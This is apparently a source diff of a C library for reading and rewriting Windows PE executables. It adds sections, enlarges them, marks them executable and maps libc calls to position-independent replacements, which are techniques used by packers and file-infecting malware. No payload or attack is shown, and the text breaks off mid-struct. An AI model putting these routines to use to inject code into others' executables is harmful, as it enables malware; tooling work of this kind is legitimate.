#define IMAGE_SIZEOF_ARCHIVE_MEMBER_HDR 60
|
||||
#define IMAGE_ORDINAL_FLAG64 0x8000000000000000
|
||||
#define IMAGE_ORDINAL_FLAG32 0x80000000
|
||||
#define IMAGE_ORDINAL_FLAG IMAGE_ORDINAL_FLAG64
|
||||
#define IMAGE_RESOURCE_NAME_IS_STRING 0x80000000
|
||||
#define IMAGE_DEBUG_TYPE_UNKNOWN 0
|
||||
|
||||
typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header
|
||||
uint16_t e_magic; // Magic number
|
||||
uint16_t e_cblp; // Bytes on last page of file
|
||||
uint16_t e_cp; // Pages in file
|
||||
uint16_t e_crlc; // Relocations
|
||||
uint16_t e_cparhdr; // Size of header in paragraphs
|
||||
uint16_t e_minalloc; // Minimum extra paragraphs needed
|
||||
uint16_t e_maxalloc; // Maximum extra paragraphs needed
|
||||
uint16_t e_ss; // Initial (relative) SS value
|
||||
uint16_t e_sp; // Initial SP value
|
||||
uint16_t e_csum; // Checksum
|
||||
uint16_t e_ip; // Initial IP value
|
||||
uint16_t e_cs; // Initial (relative) CS value
|
||||
uint16_t e_lfarlc; // File address of relocation table
|
||||
uint16_t e_ovno; // Overlay number
|
||||
uint16_t e_res[4]; // Reserved words
|
||||
uint16_t e_oemid; // OEM identifier (for e_oeminfo)
|
||||
uint16_t e_oeminfo; // OEM information; e_oemid specific
|
||||
uint16_t e_res2[10]; // Reserved words
|
||||
uint32_t e_lfanew; // File address of new exe header
|
||||
} IMAGE_DOS_HEADER ;
|
||||
|
||||
typedef struct _IMAGE_FILE_HEADER {
|
||||
uint16_t Machine;
|
||||
uint16_t NumberOfSections;
|
||||
uint32_t TimeDateStamp;
|
||||
uint32_t PointerToSymbolTable;
|
||||
uint32_t NumberOfSymbols;
|
||||
uint16_t SizeOfOptionalHeader;
|
||||
uint16_t Characteristics;
|
||||
} IMAGE_FILE_HEADER;
|
||||
|
||||
typedef struct _IMAGE_DATA_DIRECTORY {
|
||||
uint32_t VirtualAddress;
|
||||
uint32_t Size;
|
||||
} IMAGE_DATA_DIRECTORY;
|
||||
|
||||
typedef struct _IMAGE_OPTIONAL_HEADER {
|
||||
//
|
||||
// Standard fields.
|
||||
//
|
||||
|
||||
uint16_t Magic;
|
||||
uint8_t MajorLinkerVersion;
|
||||
uint8_t MinorLinkerVersion;
|
||||
uint32_t SizeOfCode;
|
||||
uint32_t SizeOfInitializedData;
|
||||
uint32_t SizeOfUninitializedData;
|
||||
uint32_t AddressOfEntryPoint;
|
||||
uint32_t BaseOfCode;
|
||||
uint32_t BaseOfData;
|
||||
|
||||
//
|
||||
// NT additional fields.
|
||||
//
|
||||
|
||||
uint32_t ImageBase;
|
||||
uint32_t SectionAlignment;
|
||||
uint32_t FileAlignment;
|
||||
uint16_t MajorOperatingSystemVersion;
|
||||
uint16_t MinorOperatingSystemVersion;
|
||||
uint16_t MajorImageVersion;
|
||||
uint16_t MinorImageVersion;
|
||||
uint16_t MajorSubsystemVersion;
|
||||
uint16_t MinorSubsystemVersion;
|
||||
uint32_t Win32VersionValue;
|
||||
uint32_t SizeOfImage;
|
||||
uint32_t SizeOfHeaders;
|
||||
uint32_t CheckSum;
|
||||
uint16_t Subsystem;
|
||||
uint16_t DllCharacteristics;
|
||||
uint32_t SizeOfStackReserve;
|
||||
uint32_t SizeOfStackCommit;
|
||||
uint32_t SizeOfHeapReserve;
|
||||
uint32_t SizeOfHeapCommit;
|
||||
uint32_t LoaderFlags;
|
||||
uint32_t NumberOfRvaAndSizes;
|
||||
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
|
||||
} IMAGE_OPTIONAL_HEADER32;
|
||||
|
||||
typedef struct _IMAGE_OPTIONAL_HEADER64 {
|
||||
uint16_t Magic;
|
||||
uint8_t MajorLinkerVersion;
|
||||
uint8_t MinorLinkerVersion;
|
||||
uint32_t SizeOfCode;
|
||||
uint32_t SizeOfInitializedData;
|
||||
uint32_t SizeOfUninitializedData;
|
||||
uint32_t AddressOfEntryPoint;
|
||||
uint32_t BaseOfCode;
|
||||
uint64_t ImageBase;
|
||||
uint32_t SectionAlignment;
|
||||
uint32_t FileAlignment;
|
||||
uint16_t MajorOperatingSystemVersion;
|
||||
uint16_t MinorOperatingSystemVersion;
|
||||
uint16_t MajorImageVersion;
|
||||
uint16_t MinorImageVersion;
|
||||
uint16_t MajorSubsystemVersion;
|
||||
uint16_t MinorSubsystemVersion;
|
||||
uint32_t Win32VersionValue;
|
||||
uint32_t SizeOfImage;
|
||||
uint32_t SizeOfHeaders;
|
||||
uint32_t CheckSum;
|
||||
uint16_t Subsystem;
|
||||
uint16_t DllCharacteristics;
|
||||
uint64_t SizeOfStackReserve;
|
||||
uint64_t SizeOfStackCommit;
|
||||
uint64_t SizeOfHeapReserve;
|
||||
uint64_t SizeOfHeapCommit;
|
||||
uint32_t LoaderFlags;
|
||||
uint32_t NumberOfRvaAndSizes;
|
||||
IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
|
||||
} IMAGE_OPTIONAL_HEADER64;
|
||||
|
||||
typedef struct _IMAGE_NT_HEADERS64 {
|
||||
uint32_t Signature;
|
||||
IMAGE_FILE_HEADER FileHeader;
|
||||
IMAGE_OPTIONAL_HEADER64 OptionalHeader;
|
||||
} IMAGE_NT_HEADERS64;
|
||||
|
||||
typedef struct _IMAGE_NT_HEADERS {
|
||||
uint32_t Signature;
|
||||
IMAGE_FILE_HEADER FileHeader;
|
||||
IMAGE_OPTIONAL_HEADER32 OptionalHeader;
|
||||
} IMAGE_NT_HEADERS32;
|
||||
|
||||
typedef struct _IMAGE_SECTION_HEADER {
|
||||
uint8_t Name[IMAGE_SIZEOF_SHORT_NAME];
|
||||
union {
|
||||
uint32_t PhysicalAddress;
|
||||
uint32_t VirtualSize;
|
||||
} Misc;
|
||||
uint32_t VirtualAddress;
|
||||
uint32_t SizeOfRawData;
|
||||
uint32_t PointerToRawData;
|
||||
uint32_t PointerToRelocations;
|
||||
uint32_t PointerToLinenumbers;
|
||||
uint16_t NumberOfRelocations;
|
||||
uint16_t NumberOfLinenumbers;
|
||||
uint32_t Characteristics;
|
||||
} IMAGE_SECTION_HEADER;
|
||||
|
||||
typedef struct _IMAGE_EXPORT_DIRECTORY {
|
||||
uint32_t Characteristics;
|
||||
uint32_t TimeDateStamp;
|
||||
uint16_t MajorVersion;
|
||||
uint16_t MinorVersion;
|
||||
uint32_t Name;
|
||||
uint32_t Base;
|
||||
uint32_t NumberOfFunctions;
|
||||
uint32_t NumberOfNames;
|
||||
uint32_t AddressOfFunctions; // RVA from base of image
|
||||
uint32_t AddressOfNames; // RVA from base of image
|
||||
uint32_t AddressOfNameOrdinals; // RVA from base of image
|
||||
} IMAGE_EXPORT_DIRECTORY;
|
||||
|
||||
typedef struct _IMAGE_IMPORT_BY_NAME {
|
||||
uint16_t Hint;
|
||||
uint8_t Name[1];
|
||||
} IMAGE_IMPORT_BY_NAME;
|
||||
|
||||
typedef struct _IMAGE_THUNK_DATA64 {
|
||||
union {
|
||||
uint64_t ForwarderString; // Puint8_t
|
||||
uint64_t Function; // PDWORD
|
||||
uint64_t Ordinal;
|
||||
uint64_t AddressOfData; // PIMAGE_IMPORT_BY_NAME
|
||||
} u1;
|
||||
} IMAGE_THUNK_DATA64;
|
||||
|
||||
typedef struct _IMAGE_THUNK_DATA32 {
|
||||
union {
|
||||
uint32_t ForwarderString; // Puint8_t
|
||||
uint32_t Function; // PDWORD
|
||||
uint32_t Ordinal;
|
||||
uint32_t AddressOfData; // PIMAGE_IMPORT_BY_NAME
|
||||
} u1;
|
||||
} IMAGE_THUNK_DATA32;
|
||||
|
||||
typedef struct _IMAGE_IMPORT_DESCRIPTOR {
|
||||
union {
|
||||
uint32_t Characteristics; // 0 for terminating null import descriptor
|
||||
uint32_t OriginalFirstThunk; // RVA to original unbound IAT (PIMAGE_THUNK_DATA)
|
||||
} u1;
|
||||
uint32_t TimeDateStamp; // 0 if not bound,
|
||||
// -1 if bound, and real date\time stamp
|
||||
// in IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT (new BIND)
|
||||
// O.W. date/time stamp of DLL bound to (Old BIND)
|
||||
|
||||
uint32_t ForwarderChain; // -1 if no forwarders
|
||||
uint32_t Name;
|
||||
uint32_t FirstThunk; // RVA to IAT (if bound this IAT has actual addresses)
|
||||
} IMAGE_IMPORT_DESCRIPTOR;
|
||||
|
||||
#endif
|
|
@ -0,0 +1,15 @@
|
|||
//License: GPLv3.0
|
||||
/*! \file peter.h
|
||||
\brief This file is the file you can actually include for using the library.
|
||||
It does nothing but including other header files.
|
||||
|
||||
*/
|
||||
#ifndef PETER_H
|
||||
#define PETER_H
|
||||
|
||||
#include "hdrs.h"
|
||||
#include "sections.h"
|
||||
#include "imports.h"
|
||||
#include "exports.h"
|
||||
|
||||
#endif
|
|
@ -0,0 +1,10 @@
|
|||
strlen:pic_strlen
|
||||
strncmp:pic_strncmp
|
||||
memcpy:pic_memcpy
|
||||
memset:pic_memset
|
||||
strncpy:pic_memcpy
|
||||
malloc:pic_malloc
|
||||
free:pic_free
|
||||
#include <stdio.h>:#include "../stdfuncs.h"
|
||||
#include <string.h>:
|
||||
#include <stdlib.h>:
|
|
@ -0,0 +1,329 @@
|
|||
//License: GPLv3.0
|
||||
#include "sections.h"
|
||||
#include "misc.h"
|
||||
|
||||
IMAGE_SECTION_HEADER *sections_by_index_get_sh(void *image, int index)
|
||||
{
|
||||
hdrs h;
|
||||
IMAGE_SECTION_HEADER *sh;
|
||||
|
||||
if (-1 == hdrs_init(&h, image))
|
||||
return NULL;
|
||||
if (index >= hdrs_get_number_of_sections(&h))
|
||||
return NULL;
|
||||
sh = hdrs_get_first_section_header(&h);
|
||||
if (-1 == test_for_list_end(sh, index, sizeof (IMAGE_SECTION_HEADER)))
|
||||
return NULL;
|
||||
hdrs_destroy(&h);
|
||||
return &sh[index];
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
IMAGE_SECTION_HEADER* sections_by_name_get_sh(void *image, const char *name)
|
||||
{
|
||||
hdrs h;
|
||||
IMAGE_SECTION_HEADER *currSh;
|
||||
|
||||
if (-1 == hdrs_init(&h, image))
|
||||
goto sections_by_name_get_sh_error;
|
||||
for (int i = 0; i < hdrs_get_number_of_sections(&h); i++)
|
||||
{
|
||||
currSh = sections_by_index_get_sh(image, i);
|
||||
if (0 == pic_strncmp(name, currSh->Name, IMAGE_SIZEOF_SHORT_NAME))
|
||||
{
|
||||
hdrs_destroy(&h);
|
||||
return currSh;
|
||||
}
|
||||
}
|
||||
sections_by_name_get_sh_error:
|
||||
hdrs_destroy(&h);
|
||||
return NULL;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
int sections_by_name_get_index(void *image, const char *name)
|
||||
{
|
||||
hdrs h;
|
||||
IMAGE_SECTION_HEADER *currSh;
|
||||
|
||||
if (-1 == hdrs_init(&h, image))
|
||||
goto sections_by_name_get_index_error;
|
||||
for (int i = 0; i < hdrs_get_number_of_sections(&h); i++)
|
||||
{
|
||||
currSh = sections_by_index_get_sh(image, i);
|
||||
if (0 == pic_strncmp(name, currSh->Name, IMAGE_SIZEOF_SHORT_NAME))
|
||||
{
|
||||
hdrs_destroy(&h);
|
||||
return i;
|
||||
}
|
||||
}
|
||||
sections_by_name_get_index_error:
|
||||
hdrs_destroy(&h);
|
||||
return -1;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
char *sections_by_index_get_name(void *image, int idx)
|
||||
{
|
||||
IMAGE_SECTION_HEADER *sh;
|
||||
|
||||
sh = sections_by_index_get_sh(image, idx);
|
||||
if (NULL == sh) return NULL;
|
||||
return sh->Name;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void *sections_by_name_get_pointer_to_memory(void *image, const char *name)
|
||||
{
|
||||
IMAGE_SECTION_HEADER *sh = sections_by_name_get_sh(image, name);
|
||||
return &((char*)image)[sh->PointerToRawData];
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void sections_by_name_set_name(void *image, const char *name, const char *replace)
|
||||
{
|
||||
IMAGE_SECTION_HEADER *sh;
|
||||
|
||||
sh = sections_by_name_get_sh(image, name);
|
||||
pic_memset(sh->Name, 0, IMAGE_SIZEOF_SHORT_NAME);
|
||||
pic_memcpy(sh->Name, replace, IMAGE_SIZEOF_SHORT_NAME);
|
||||
return;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void sections_by_name_set_characteristics(void *image, const char *name, uint32_t characteristics)
|
||||
{
|
||||
IMAGE_SECTION_HEADER *sh;
|
||||
|
||||
sh = sections_by_name_get_sh(image, name);
|
||||
sh->Characteristics = characteristics;
|
||||
return;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t sections_by_name_get_characteristics(void *image, const char *name)
|
||||
{
|
||||
IMAGE_SECTION_HEADER *sh;
|
||||
|
||||
sh = sections_by_name_get_sh(image, name);
|
||||
return sh->Characteristics;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
int sections_by_name_is_writable(void *image, const char *name)
|
||||
{
|
||||
uint32_t flags = sections_by_name_get_characteristics(image, name);
|
||||
|
||||
if (IMAGE_SCN_MEM_WRITE & flags)
|
||||
return 1;
|
||||
return 0;
|
||||
}
|
||||
//////////////////////////////////////////////////
|
||||
|
||||
int sections_by_name_is_readable(void *image, const char *name)
|
||||
{
|
||||
uint32_t flags = sections_by_name_get_characteristics(image, name);
|
||||
|
||||
if (IMAGE_SCN_MEM_READ & flags)
|
||||
return 1;
|
||||
return 0;
|
||||
}
|
||||
|
||||
////////////////////////////////////////////////
|
||||
|
||||
int sections_by_name_is_executable(void *image, const char *name)
|
||||
{
|
||||
uint32_t flags = sections_by_name_get_characteristics(image, name);
|
||||
|
||||
if (IMAGE_SCN_MEM_EXECUTE & flags)
|
||||
return 1;
|
||||
return 0;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void sections_by_name_set_writable(void *image, const char *name)
|
||||
{
|
||||
IMAGE_SECTION_HEADER *sh;
|
||||
|
||||
sh = sections_by_name_get_sh(image, name);
|
||||
sh->Characteristics = (sh->Characteristics | IMAGE_SCN_MEM_WRITE);
|
||||
}
|
||||
//////////////////////////////////////////////////
|
||||
|
||||
void sections_by_name_set_readable(void *image, const char *name)
|
||||
{
|
||||
IMAGE_SECTION_HEADER *sh;
|
||||
|
||||
sh = sections_by_name_get_sh(image, name);
|
||||
sh->Characteristics = (sh->Characteristics | IMAGE_SCN_MEM_READ);
|
||||
}
|
||||
|
||||
////////////////////////////////////////////////
|
||||
|
||||
void sections_by_name_set_executable(void *image, const char *name)
|
||||
{
|
||||
IMAGE_SECTION_HEADER *sh;
|
||||
|
||||
sh = sections_by_name_get_sh(image, name);
|
||||
sh->Characteristics = (sh->Characteristics | IMAGE_SCN_MEM_EXECUTE);
|
||||
}
|
||||
|
||||
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void *sections_add_section(void *image, int imageSz, void *spaceRetImage,
|
||||
int spaceSz, const char *name, uint32_t size)
|
||||
{
|
||||
void *newImage;
|
||||
int newImageSz;
|
||||
IMAGE_SECTION_HEADER *newSection, *lastSection;
|
||||
hdrs h;
|
||||
|
||||
if (-1 == hdrs_init(&h, image))
|
||||
return NULL;
|
||||
newImageSz = imageSz + align(size, hdrs_get_file_alignment(&h));
|
||||
if (newImageSz > spaceSz) return NULL;
|
||||
newImage = spaceRetImage;
|
||||
hdrs_destroy(&h);
|
||||
pic_memcpy(newImage, image, imageSz);
|
||||
if (-1 == hdrs_init(&h, newImage))
|
||||
goto sections_add_section_error;
|
||||
/*hdrs_get_number_of_sections returns the index of the last section+1
|
||||
because indexes start counting with 0*/
|
||||
newSection = sections_by_index_get_sh(newImage,
|
||||
(hdrs_get_number_of_sections(&h)-1));
|
||||
newSection++;
|
||||
pic_memcpy(newSection->Name, name, IMAGE_SIZEOF_SHORT_NAME);
|
||||
newSection->Misc.VirtualSize = size;
|
||||
lastSection = sections_by_index_get_sh(newImage,
|
||||
hdrs_get_number_of_sections(&h)-1);
|
||||
newSection->VirtualAddress = lastSection->VirtualAddress
|
||||
+ lastSection->Misc.VirtualSize;
|
||||
newSection->VirtualAddress = align(newSection->VirtualAddress,
|
||||
hdrs_get_section_alignment(&h));
|
||||
newSection->SizeOfRawData = align(size, hdrs_get_file_alignment(&h));
|
||||
newSection->PointerToRawData = lastSection->PointerToRawData
|
||||
+ lastSection->SizeOfRawData;
|
||||
newSection->Characteristics = 0;
|
||||
hdrs_set_number_of_sections(&h, hdrs_get_number_of_sections(&h)+1);
|
||||
hdrs_set_size_of_image(&h, hdrs_get_size_of_image(&h)
|
||||
+ align(newSection->Misc.VirtualSize,
|
||||
hdrs_get_section_alignment(&h)));
|
||||
/*relocate the symbol table*/
|
||||
int stripSz;
|
||||
char *stripBuf;
|
||||
if (hdrs_get_pointer_to_symbol_table(&h))
|
||||
{
|
||||
stripSz = imageSz - hdrs_get_pointer_to_symbol_table(&h);
|
||||
stripBuf = pic_malloc(stripSz);
|
||||
pic_memcpy(stripBuf, &((char*)newImage)[hdrs_get_pointer_to_symbol_table(&h)], stripSz);
|
||||
hdrs_set_pointer_to_symbol_table(&h, newSection->PointerToRawData
|
||||
+ newSection->SizeOfRawData);
|
||||
pic_memcpy(&((char*)newImage)[hdrs_get_pointer_to_symbol_table(&h)], stripBuf,
|
||||
stripSz);
|
||||
pic_free(stripBuf);
|
||||
}
|
||||
return &((char *)newImage)[newSection->PointerToRawData];
|
||||
sections_add_section_error:
|
||||
pic_free(newImage);
|
||||
return NULL;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t sections_get_sizeof_image_after_add_section(void *oldImage,
|
||||
uint32_t oldSz,
|
||||
uint32_t addedSz)
|
||||
{
|
||||
hdrs h;
|
||||
uint32_t newImageSz;
|
||||
|
||||
hdrs_init(&h, oldImage);
|
||||
newImageSz = oldSz + align(addedSz, hdrs_get_file_alignment(&h));
|
||||
hdrs_destroy(&h);
|
||||
return newImageSz;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void *sections_by_name_enlarge(void *image, const char *name,
|
||||
char *bytes, uint32_t bytesLen)
|
||||
{
|
||||
IMAGE_SECTION_HEADER *enlargeSec;
|
||||
char *writePtr;
|
||||
|
||||
enlargeSec = sections_by_name_get_sh(image, name);
|
||||
|
||||
if (NULL == enlargeSec) return NULL;
|
||||
|
||||
if ((enlargeSec->SizeOfRawData - enlargeSec->Misc.VirtualSize) < bytesLen)
|
||||
return NULL;
|
||||
writePtr = rva_to_ptr(image, (enlargeSec->VirtualAddress));
|
||||
writePtr += enlargeSec->Misc.VirtualSize;
|
||||
enlargeSec->Misc.VirtualSize += bytesLen;
|
||||
if (NULL != bytes)
|
||||
pic_memcpy(writePtr, bytes, bytesLen);
|
||||
return (void *)writePtr;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t rva_to_raw(char *image, uint32_t rva)
|
||||
{
|
||||
hdrs h;
|
||||
hdrs_init(&h, image);
|
||||
IMAGE_SECTION_HEADER *sh;
|
||||
|
||||
for(int i = 0; i < hdrs_get_number_of_sections(&h); i++)
|
||||
{
|
||||
sh = sections_by_index_get_sh(image, i);
|
||||
if (sh->VirtualAddress <= rva
|
||||
&& rva < (sh->VirtualAddress + sh->Misc.VirtualSize))
|
||||
return (rva - sh->VirtualAddress + sh->PointerToRawData);
|
||||
}
|
||||
return -1;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
void *rva_to_ptr(void *image, uint32_t rva)
|
||||
{
|
||||
return &((char *)image)[rva_to_raw(image, rva)];
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t raw_to_rva(char *image, uint32_t raw)
|
||||
{
|
||||
hdrs h;
|
||||
IMAGE_SECTION_HEADER *sh;
|
||||
hdrs_init(&h, image);
|
||||
|
||||
for (int i = 0; i < hdrs_get_number_of_sections(&h); i++)
|
||||
{
|
||||
sh = sections_by_index_get_sh(image, i);
|
||||
if (sh->PointerToRawData <= raw
|
||||
&& raw < (sh->PointerToRawData + sh->SizeOfRawData))
|
||||
return (raw - sh->PointerToRawData + sh->VirtualAddress);
|
||||
}
|
||||
return -1;
|
||||
}
|
||||
|
||||
/////////////////////////////////////////////////
|
||||
|
||||
uint32_t ptr_to_rva(void *image, void *ptr)
|
||||
{
|
||||
uint32_t raw;
|
||||
raw = (uint32_t)(ptr - image);
|
||||
return raw_to_rva(image, raw);
|
||||
}
|
|
@ -0,0 +1,191 @@
|
|||
//License: GPLv3.0
|
||||
/*! \file sections.h
|
||||
\brief This file contains functions for getting information concerning the
|
||||
section headers (e.g. sections_by_name_is_writable() informs you
|
||||
wether the writable flag in a section header is set).
|
||||
An other type of function changes the values within the section
|
||||
headers (set functions like sections_by_name_set_name() ) or may even
|
||||
add a new one. The functions which convert e.g. pointers to rva
|
||||
values where placed in this header too, because they need information
|
||||
from the section headers to calculate their return values.
|
||||
*/
|
||||
#include "hdrs.h"
|
||||
#ifndef SECTIONS_HDR
|
||||
#define SECTIONS_HDR
|
||||
/*! \fn IMAGE_SECTION_HEADER *sections_by_index_get_sh(void *image, int index)
|
||||
\brief returns a pointer on the IMAGE_SECTION_HEADER at the indexed
|
||||
poisition.
|
||||
\param image is a pointer on the PE file in memory.
|
||||
\param index starts with 0 and is 1 if you want the second section header.
|
||||
*/
|
||||
IMAGE_SECTION_HEADER *sections_by_index_get_sh(void *image, int index);
|
||||
/*! \fn IMAGE_SECTION_HEADER *sections_by_name_get_sh(void *image,
|
||||
const char *name)
|
||||
\brief like sections_by_index_get_sh() but index is replaced by the section
|
||||
name.
|
||||
\param image is the PE file.
|
||||
\param name is a pointer on the section name. It should not exceed 8 bytes
|
||||
since the section names of PE files are not alowed to be longer
|
||||
than 8 bytes.
|
||||
*/
|
||||
IMAGE_SECTION_HEADER *sections_by_name_get_sh(void *image, const char *name);
|
||||
/*! \fn int sections_by_name_get_index(void *image, const char *name);
|
||||
\brief Tells you at which position the section header with the name xy lies.
|
||||
\param image is the PE file.
|
||||
\param name is the name of the section (max 8 byte)
|
||||
**/
|
||||
int sections_by_name_get_index(void *image, const char *name);
|
||||
/*! \fn uint32_t sections_by_name_get_characteristics(void *image,
|
||||
const char *name)
|
||||
\brief returns the characteristics field of a section header.
|
||||
\param image is like always the PE file.
|
||||
\param name is the section name.
|
||||
**/
|
||||
uint32_t sections_by_name_get_characteristics(void *image, const char *name);
|
||||
|
||||
/*! \fn char *sections_by_index_get_name(void *image, int idx)
|
||||
\brief returns the name of the section nr idx
|
||||
\param index is the PE file.
|
||||
\param idx is the section index (starts with 0)
|
||||
*/
|
||||
char *sections_by_index_get_name(void *image, int idx);
|
||||
|
||||
/*! \fn int sections_by_name_is_writable(void *image, const char *name)
|
||||
\brief returns 1 if the section is writable and 0 if not
|
||||
\param image is the PE file.
|
||||
\param name is the section name
|
||||
*/
|
||||
int sections_by_name_is_writable(void *image, const char *name);
|
||||
/*! \fn int sections_by_name_is_readable(void *image, const char *name)
|
||||
\brief returns 1 if section is readable and 0 if not
|
||||
\param image is the PE file.
|
||||
\param name is the section name.
|
||||
*/
|
||||
int sections_by_name_is_readable(void *image, const char *name);
|
||||
/*! \fn int sections_by_name_is_executable(void *image, const char *name)
|
||||
\brief returns 1 if the section is executable and 0 if not.
|
||||
\param image is the PE file.
|
||||
\param name is the section name.
|
||||
*/
|
||||
int sections_by_name_is_executable(void *image, const char *name);
|
||||
/*! \fn void *sections_by_name_get_pointer_to_memory(void *image,
|
||||
const char *name)
|
||||
\brief returns a pointer on the first byte of a section
|
||||
\param image is the PE file.
|
||||
\param name is the section name.
|
||||
*/
|
||||
void *sections_by_name_get_pointer_to_memory(void *image, const char *name);
|
||||
|
||||
/*! \fn uint32_t rva_to_raw(char *image, uint32_t rva)
|
||||
\brief you give it a 32bit rva and it returns the raw offset
|
||||
\param image is the PE file.
|
||||
\param rva
|
||||
*/
|
||||
uint32_t rva_to_raw(char *image, uint32_t rva);
|
||||
/*! \fn void *rva_to_ptr(void *image, uint32_t rva)
|
||||
|
||||
\param image
|
||||
\param rva
|
||||
*/
|
||||
void *rva_to_ptr(void *image, uint32_t rva);
|
||||
/*! \fn uint32_t raw_to_rva(char *image, uint32_t raw)
|
||||
\brief returns a rva if you give it a raw offset
|
||||
\param image
|
||||
\param raw
|
||||
*/
|
||||
uint32_t raw_to_rva(char *image, uint32_t raw);
|
||||
/*! \fn uint32_t ptr_to_rva(char *image, char *ptr)
|
||||
\brief makes a rva address from a pointer
|
||||
\param image
|
||||
\param ptr
|
||||
*/
|
||||
uint32_t ptr_to_rva(void *image, void *ptr);
|
||||
|
||||
/*! \fn void sections_by_name_set_writable(void *image, const char *name)
|
||||
\brief Sets the writable flag in the section header
|
||||
\param image is the PE image
|
||||
\param name is the section name
|
||||
*/
|
||||
void sections_by_name_set_writable(void *image, const char *name);
|
||||
|
||||
/*! \fn void sections_by_name_set_readable(void *image, const char *name)
|
||||
\brief sets the readable flag in the section header
|
||||
\param image
|
||||
\param name
|
||||
*/
|
||||
void sections_by_name_set_readable(void *image, const char *name);
|
||||
|
||||
/*! \fn void sections_by_name_set_executable(void *image, const char *name)
|
||||
\brief sets the executable flag in the section header
|
||||
\param image
|
||||
\param name
|
||||
*/
|
||||
void sections_by_name_set_executable(void *image, const char *name);
|
||||
|
||||
/*! \fn void sections_by_name_set_name(void *image, const char *name,
|
||||
const char *replace)
|
||||
\brief replaces the section name with a section name of your choise
|
||||
(8 byte max)
|
||||
\param image is the PE file
|
||||
\param name is the section name you want to replace
|
||||
\param replace is the new section name
|
||||
*/
|
||||
void sections_by_name_set_name(void *image, const char *name,
|
||||
const char *replace);
|
||||
/*! \fn void sections_by_name_set_characteristics(void *image,
|
||||
const char *name,
|
||||
uint32_t characteristics)
|
||||
\brief sets the characteristics field of a section header.
|
||||
\param image is the PE file.
|
||||
\param name is the name of the section
|
||||
\param characteristics is the value the characteristics filed should be changed to.
|
||||
*/
|
||||
void sections_by_name_set_characteristics(void *image, const char *name,
|
||||
uint32_t characteristics);
|
||||
|
||||
/*! \fn void *sections_add_section(void *image, int imageSz,
|
||||
void *spaceRetImage, int spaceSz,
|
||||
const char *name, uint32_t size)
|
||||
\brief Creates a new PE image from image. The new image will be written to
|
||||
spaceSpaceRetImage is there is enough space. The new image will be
|
||||
like the old but with a section added to it. You can calculate the
|
||||
number of bytes you must allocate with:
|
||||
sections_get_sizeof_image_after_add_section().
|
||||
The return value is a pointer on the first byte of the new section.
|
||||
\param image is the old pe image
|
||||
\param imageSz is the size of the old image in bytes
|
||||
\param spaceRetImage should point on an allocated space in memory
|
||||
\param spaceSz must contain the size in bytes of the memory spaceRetImage
|
||||
is pointing to.
|
||||
\param name is the name of the new section (not longer than 8 bytes)
|
||||
\param size is how big you want the new section to be (in bytes)
|
||||
*/
|
||||
void *sections_add_section(void *image, int imageSz, void *spaceRetImage,
|
||||
int spaceSz, const char *name, uint32_t size);
|
||||
/*! \fn uint32_t sections_get_sizeof_image_after_add_section(void *oldImage,
|
||||
uint32_t oldSz,
|
||||
uint32_t addedSz)
|
||||
\brief calculates the size, the image will have after adding a section
|
||||
\param oldImage is the PE image before adding a section
|
||||
\param oldSz is the size of the image, oldImage is pointing to
|
||||
\param addedSz is the size of the section you want to add.
|
||||
*/
|
||||
uint32_t sections_get_sizeof_image_after_add_section(void *oldImage,
|
||||
uint32_t oldSz,
|
||||
uint32_t addedSz);
|
||||
|
||||
/*! \fn void *sections_by_name_enlarge(void *image, const char *name,
|
||||
char *bytes, uint32_t bytesLen)
|
||||
\brief enlarges a section and returns a pointer on the first byte of the
|
||||
new allocated space. If it fails it returns NULL.
|
||||
\param image is the PE image
|
||||
\param name is the name of the section you want to enlarge
|
||||
\param bytes are the bytes you want to add to the section. It can be NULL.
|
||||
\param bytesLen is the size in bytes by which you want the section to be
|
||||
enlarged.
|
||||
*/
|
||||
void *sections_by_name_enlarge(void *image, const char *name,
|
||||
char *bytes, uint32_t bytesLen);
|
||||
|
||||
|
||||
#endif
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,216 @@
|
|||
#include <stdlib.h>
|
||||
#include "peb.h"
|
||||
#include "export.h"
|
||||
#include <stdio.h>
|
||||
#include "winfuncs.h"
|
||||
#ifndef STDFUNCS
|
||||
#define STDFUNCS 1
|
||||
|
||||
#define MAX_PATH 260
|
||||
|
||||
typedef struct _FILETIME {
|
||||
uint32_t dwLowDateTime;
|
||||
uint32_t dwHighDateTime;
|
||||
} FILETIME, *PFILETIME;
|
||||
|
||||
typedef struct _WIN32_FIND_DATAA {
|
||||
uint32_t dwFileAttributes;
|
||||
FILETIME ftCreationTime;
|
||||
FILETIME ftLastAccessTime;
|
||||
FILETIME ftLastWriteTime;
|
||||
uint32_t nFileSizeHigh;
|
||||
uint32_t nFileSizeLow;
|
||||
uint32_t dwReserved0;
|
||||
uint32_t dwReserved1;
|
||||
char cFileName[MAX_PATH];
|
||||
char cAlternateFileName[14];
|
||||
uint32_t dwFileType;
|
||||
uint32_t dwCreatorType;
|
||||
uint16_t wFinderFlags;
|
||||
} WIN32_FIND_DATAA, *PWIN32_FIND_DATAA, *LPWIN32_FIND_DATAA;
|
||||
|
||||
typedef struct __FILE_DATA {
|
||||
char *data;
|
||||
